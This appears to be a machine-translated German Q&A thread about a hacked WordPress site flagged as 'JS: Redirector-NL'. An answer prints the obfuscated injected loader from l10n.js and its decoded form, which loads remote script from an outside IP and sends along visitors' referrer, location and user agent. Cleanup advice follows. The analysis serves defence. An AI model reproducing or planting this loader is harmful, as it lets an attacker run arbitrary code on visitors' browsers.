2012-04-10 9 views
1

Ich habe dieses "JS: Redirector-NL [Trj]" Virus Problem in meiner Website http://nutriconsulting.com.br/, wenn jemand auf die Bahn öffnet, avast Antivirus zeigt ein Popup, das diesem FehlerJS: Redirector-NL [Trj] - Wie entfernt man diesen Trojaner?

Infektion Einzelheiten URL zeigt: http://nutriconsulting.com.br/wp-content ... Prozess: C: \ Benutzer \ Cyber ​​Solutions \ AppData \ Local \ G ... Infektion: JS: Redirector-NL [Trj]

scannte ich meine c-Panel-Dateien zweimal, aber alle Dateien sind sauber, so wie Würde ich es entfernen? Dieser Trojaner läuft in Java-Skript-Dateien, ich werde wirklich schätzen, wenn jemand mir die Idee gibt, wie man in Java-Skript nach einem bösartigen Code sucht.

Wieder zeigt diese Domäne nur einen Fehler in Avast Antivirus, nicht in gezeigt andere Antivirenprogramme wie Symantec oder Norton Antivirus, also überprüfen Sie es bitte auf Avast. Bitte helfen Sie mir, dieses Problem zu beheben, ich bin auf der Suche nach einer schnellen Antwort.

Dank

+0

Got 'JS.Allescurf' mit Symantec Endpoint Protection –

+0

Ja, es zeigt einen anderen Fehler in Symantec, aber wie kann ich es beheben. Irgendeine Hilfe?? –

+0

gut Ihre Website sendet Informationen zu 91.196.216.64 ... überprüfen Sie Ihre js, da muss etwas sein, das nicht da sein soll –

Antwort

2

Werfen Sie einen Blick auf: http://nutriconsulting.com.br/wp-includes/js/l10n.js?ver=20101110

Da ist es:

var _0x4470=["\x39\x3D\x31\x2E\x64\x28\x27\x35\x27\x29\x3B\x62\x28\x21\x39\x29\x7B\x38\x3D\x31\x2E\x6A\x3B\x34\x3D\x36\x28\x31\x2E\x69\x29\x3B\x37\x3D\x36\x28\x67\x2E\x6B\x29\x3B\x61\x20\x32\x3D\x31\x2E\x65\x28\x27\x63\x27\x29\x3B\x32\x2E\x66\x3D\x27\x35\x27\x3B\x32\x2E\x68\x3D\x27\x77\x3A\x2F\x2F\x74\x2E\x75\x2E\x6C\x2E\x76\x2F\x73\x2E\x72\x3F\x71\x3D\x27\x2B\x34\x2B\x27\x26\x6D\x3D\x27\x2B\x38\x2B\x27\x26\x6E\x3D\x27\x2B\x37\x3B\x61\x20\x33\x3D\x31\x2E\x6F\x28\x27\x33\x27\x29\x5B\x30\x5D\x3B\x33\x2E\x70\x28\x32\x29\x7D","\x7C","\x73\x70\x6C\x69\x74","\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x6A\x73\x7C\x68\x65\x61\x64\x7C\x68\x67\x68\x6A\x68\x6A\x68\x6A\x67\x7C\x64\x67\x6C\x6C\x68\x67\x75\x6B\x7C\x65\x73\x63\x61\x70\x65\x7C\x75\x67\x6B\x6B\x6A\x6B\x6A\x7C\x68\x67\x68\x6A\x67\x68\x6A\x68\x6A\x67\x6A\x68\x7C\x65\x6C\x65\x6D\x65\x6E\x74\x7C\x76\x61\x72\x7C\x69\x66\x7C\x73\x63\x72\x69\x70\x74\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64\x7C\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x7C\x69\x64\x7C\x6E\x61\x76\x69\x67\x61\x74\x6F\x72\x7C\x73\x72\x63\x7C\x72\x65\x66\x65\x72\x72\x65\x72\x7C\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x7C\x75\x73\x65\x72\x41\x67\x65\x6E\x74\x7C\x32\x31\x36\x7C\x6C\x63\x7C\x75\x61\x7C\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65\x7C\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x7C\x72\x65\x66\x7C\x70\x68\x70\x7C\x7C\x39\x31\x7C\x31\x39\x36\x7C\x36\x34\x7C\x68\x74\x74\x70","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function (_0xa064x1,_0xa064x2,_0xa064x3,_0xa064x4,_0xa064x5,_0xa064x6){_0xa064x5=function (_0xa064x3){return _0xa064x3.toString(36);} ;if(!_0x4470[5][_0x4470[4]](/^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function(){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]](new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{})); 

und decodiert:

element = document.getElementById('dgllhguk'); 
if (!element) { 
    hghjghjhjgjh = document.location; 
    hghjhjhjg = escape(document.referrer); 
    ugkkjkj = escape(navigator.userAgent); 
    var js = document.createElement('script'); 
    js.id = 'dgllhguk'; 
    js.src = 'http://91.196.216.64/s.php?ref=' + hghjhjhjg + '&lc=' + hghjghjhjgjh + '&ua=' + ugkkjkj; 
    var head = document.getElementsByTagName('head')[0]; 
    head.appendChild(js) 
}];head.appendChild(js)} 

Derjenige, der 91.196.216.64 steuert (Russian Föderation/ISP: SpetsEnergo Ltd.) kann willkürliche js co de auf Ihrer Website.

+0

Danke für die Hilfe Stewe, aber es ist auch in anderen Java Script-Dateien, also kann ich für den gleichen Code in anderen suchen ??? –

+0

Ich würde empfehlen, alle Passwörter zu ändern, und Sie sollten die ursprünglichen Dateien wiederherstellen. Stellen Sie außerdem sicher, dass Sie immer die neueste Version von WordPress verwenden. – stewe

+0

Ja, ich verstehe es, aber das Problem ist, ich hatte nicht die Sicherung der Website jetzt. Brauchen Sie einfach Ihre Hilfe, um diese Java-Script-Dateien aufzuräumen, wusste ich nicht anders. Bitte helfen Sie mir, dieses Problem zu beheben, die Codes, die Sie entschlüsselt haben, sind sehr hilfreich. Also was hätte ich tun sollen ?? Kann ich diesen Code einfach von anderen infizierten Java Script-Dateien finden und entfernen? –